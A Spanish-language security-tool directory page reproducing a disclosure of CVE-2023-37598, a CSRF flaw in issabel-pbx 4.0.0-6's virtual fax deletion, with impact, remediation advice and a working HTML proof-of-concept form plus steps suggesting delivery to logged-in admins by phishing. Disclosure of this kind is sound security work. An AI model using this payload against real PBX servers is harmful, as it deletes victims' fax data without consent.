Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-37598 — Existe una vulnerabilidad de Cross-Site Request Forgery (CSRF) en issabel-pbx v4.0.0-6 dentro de la funcionalidad de gestión de Virtual Fax. | Kitploit
Herramientas/GitHubGitHub/sahiloj/cve-2023-37598
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAprendizaje y Educación
GitHubsahiloj/cve-2023-37598

CVE-2023-37598

Existe una vulnerabilidad de Cross-Site Request Forgery (CSRF) en issabel-pbx v4.0.0-6 dentro de la funcionalidad de gestión de Virtual Fax.

Ver Repositorio
11hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-37598 — issabel-pbx 4.0.0-6: Falsificación de Solicitudes entre Sitios (CSRF)

Resumen

CVE ID: CVE-2023-37598
Tipo de vulnerabilidad: Falsificación de Solicitudes entre Sitios (CSRF)
Producto afectado: issabel-pbx v4.0.0-6
Gravedad: Media
Descubierto por: Sahil Ojha
Fecha de divulgación: 10/07/2023
Página del proveedor: https://www.issabel.org/
Repositorio del software: https://github.com/IssabelFoundation/issabelPBX
Probado en: Windows


Descripción

Existe una vulnerabilidad de Falsificación de Solicitudes entre Sitios (CSRF) en issabel-pbx v4.0.0-6 dentro de la funcionalidad de gestión de fax virtual. La aplicación no implementa protección CSRF (por ejemplo, tokens anti-CSRF o atributos de cookie same-site) en la acción de borrado de las entradas de fax virtual.

Esto permite a un atacante remoto no autenticado crear una página HTML maliciosa que — cuando es visitada por un administrador o usuario autenticado — envía silenciosamente una solicitud HTTP falsificada a la aplicación en nombre de la víctima. La solicitud falsificada provoca el borrado de los registros de fax virtual sin el conocimiento ni consentimiento de la víctima, resultando en pérdida de datos e interrupción de los servicios de fax.

¿Qué es el CSRF?

La Falsificación de Solicitudes entre Sitios (CSRF) es un ataque que engaña al navegador de la víctima para que envíe una solicitud autenticada a una aplicación web sin la intención del usuario. Debido a que el navegador incluye automáticamente las cookies de sesión en cada solicitud, el servidor no puede distinguir una solicitud legítima de una falsificada cuando no hay token CSRF presente.


Impacto

  • Pérdida de datos: Un atacante puede eliminar entradas de fax virtual pertenecientes a cualquier usuario, haciendo que los datos de fax sean permanentemente inaccesibles.
  • Cambio de estado no autorizado: Los registros de fax administrativos pueden ser eliminados silenciosamente sin ninguna interacción o conocimiento del usuario legítimo.
  • No se requiere autenticación para el atacante: El atacante no necesita credenciales válidas — solo la víctima (que ya ha iniciado sesión) necesita visitar la página controlada por el atacante.

Componente afectado

ParámetroValor

Prueba de Concepto (PoC)

El siguiente archivo HTML, cuando es abierto por un usuario autenticado de issabel-pbx, enviará automáticamente una solicitud POST falsificada que elimina el fax virtual con id_fax=1.

Archivo: CSRF exploit.html

root@kitploit:~
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://{Issabel IP}/index.php?menu=faxnew&action=view&id=1" method="POST">
      <input type="hidden" name="delete" value="Delete" />
      <input type="hidden" name="id_fax" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Nota: Reemplace {Issabel IP} con la dirección IP o el nombre de host del servidor objetivo. El valor de id_fax puede cambiarse para apuntar a cualquier registro de fax virtual según su ID.


Pasos para Reproducir

  1. Inicie sesión en el panel de administración de Issabel PBX y navegue a la página de fax virtual:

    root@kitploit:~
    https://{Issabel IP}/index.php?menu=faxnew&action=view&id=1
    

    Paso 1 – Página de fax virtual de Issabel

  2. Capture la solicitud de borrado usando el proxy de Burp Suite. Intente eliminar una entrada de fax virtual, intercepte la solicitud, haga clic derecho sobre ella y navegue a Engagement Tools → Generate CSRF PoC.

    Paso 2 – Generar PoC CSRF en Burp Suite

  3. Guarde el exploit CSRF generado como un archivo HTML (vea el PoC anterior).

  4. Entregue el exploit a un usuario que ya haya iniciado sesión en la aplicación Issabel (por ejemplo, mediante un correo de phishing o un enlace malicioso). Cuando la víctima abra la página y haga clic en "Submit request", la entrada de fax virtual se eliminará sin ninguna interacción adicional.

    Paso 3 – HTML del exploit CSRF renderizado en el navegador

    Paso 4 – Fax virtual eliminado del panel de administración


Escenario de Ataque

Un atacante aloja el archivo HTML malicioso en un servidor externo o lo incrusta en un correo electrónico. Cuando un administrador de Issabel PBX autenticado abre esta página en la misma sesión del navegador, el navegador envía automáticamente la solicitud POST falsificada — incluyendo la cookie de sesión válida — al servidor Issabel. El servidor procesa la solicitud como legítima, eliminando el registro de fax virtual objetivo. La víctima no recibe ninguna advertencia y puede no notar el borrado hasta que inspeccione manualmente la lista de faxes.


Remediación

Para remediar esta vulnerabilidad, el proveedor debería implementar una o más de las siguientes mitigaciones:

  1. Tokens Anti-CSRF: Incluya un token único, impredecible y por sesión en todos los formularios que cambian el estado y verifíquelo en el servidor antes de procesar la solicitud.
  2. Atributo de cookie SameSite: Configure la cookie de sesión con SameSite=Strict o SameSite=Lax para evitar que el navegador la envíe con solicitudes entre orígenes.
  3. Cabeceras de solicitud personalizadas: Exija una cabecera HTTP personalizada (por ejemplo, X-Requested-With: XMLHttpRequest) para todas las operaciones sensibles y verifíquela en el servidor.
  4. Re-autenticación para acciones destructivas: Solicite a los usuarios que vuelvan a introducir su contraseña o confirmen su identidad antes de realizar operaciones irreversibles como el borrado.

Referencias

  • NVD – CVE-2023-37598
  • OWASP – Falsificación de Solicitudes entre Sitios (CSRF)
  • Repositorio de Issabel PBX en GitHub
  • Sitio web oficial de Issabel
Descargar herramienta
Aplicaciónissabel-pbx
Versión4.0.0-6
URL vulnerable/index.php?menu=faxnew&action=view&id=<ID>
Acción vulnerabledelete (parámetro POST)
Protección faltanteToken CSRF / atributo de cookie SameSite